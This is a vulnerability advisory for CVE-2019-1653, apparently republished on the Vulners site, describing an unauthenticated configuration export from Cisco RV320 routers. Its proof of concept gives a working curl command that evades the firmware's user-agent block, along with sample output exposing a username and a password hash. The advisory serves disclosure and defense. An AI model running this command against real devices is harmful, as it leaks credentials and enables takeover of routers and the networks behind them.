Vulners
Lucene search
Cisco RV320 Unauthenticated Configuration Export Vulnerability
10
Cisco RV320 Unauthenticated Configuration Export Vulnerability
Details
=======
Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions: 1.4.2.15 through 1.4.2.20
Fixed Versions: none
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
Vendor Status: working on patch
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-003
Advisory Status: published
CVE: CVE-2019-1653
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653
Introduction
============
"Keep your employees, your business, and yourself productive and
effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal
choice for any small office or small business looking for performance,
security, and reliability in its network."
(from the Cisco RV320 product page [1])
More Details
============
The Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based
configuration interface, which is implemented in various CGI programs in
the device's firmware. Access to this web interface requires prior
authentication using a username and password. Previously, RedTeam
Pentesting identified a vulnerability (rt-sa-2018-002) [2] in the CGI
program:
/cgi-bin/config.exp
By issuing an HTTP GET request to this program, it was possible to
export a router's configuration without providing any prior
authentication. This vulnerability was adressed in firmware version
1.4.2.19 published by Cisco [3].
RedTeam Pentesting discovered that the CGI program in the patched
firmware is still vulnerable. By performing a specially crafted HTTP
POST request, attackers are still able to download the router's
configuration. The user agent "curl" is blacklisted by the firmware and
must be adjusted in the HTTP client. Again, exploitation does not
require any authentication.
Proof of Concept
================
A device's configuration can be retrieved by issuing an HTTP POST request
to the vulnerable CGI program (output shortened):
------------------------------------------------------------------------
$ curl -s -k -A kurl -X POST --data 'submitbkconfig=0' \
'https://192.168.1.1/cgi-bin/config.exp'
####sysconfig####
[VERSION]
VERSION=73
MODEL=RV320
SSL=0
IPSEC=0
PPTP=0
PLATFORMCODE=RV0XX
[...]
[SYSTEM]
HOSTNAME=router
DOMAINNAME=example.com
DOMAINCHANGE=1
USERNAME=cisco
PASSWD=066bae9070a9a95b3e03019db131cd40
[...]
------------------------------------------------------------------------
Workaround
==========
Prevent untrusted clients from connecting to the device's web server.
Fix
===
None
Security Risk
=============
This vulnerability is rated as a high risk as it exposes the device's
configuration to untrusted, potentially malicious parties. By
downloading the configuration, attackers can obtain internal network
configuration, VPN or IPsec secrets, as well as password hashes for the
router's user accounts. Knowledge of a user's password hash is
sufficient to log into the router's web interface, cracking of the hash
is not required. Any information obtained through exploitation of this
vulnerability can be used to facilitate further compromise of the device
itself or attached networks.
# 0day.today [2019-03-30] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Mar 2019 00:00Current
0.6Low risk
Vulners AI Score0.6
EPSS0.94385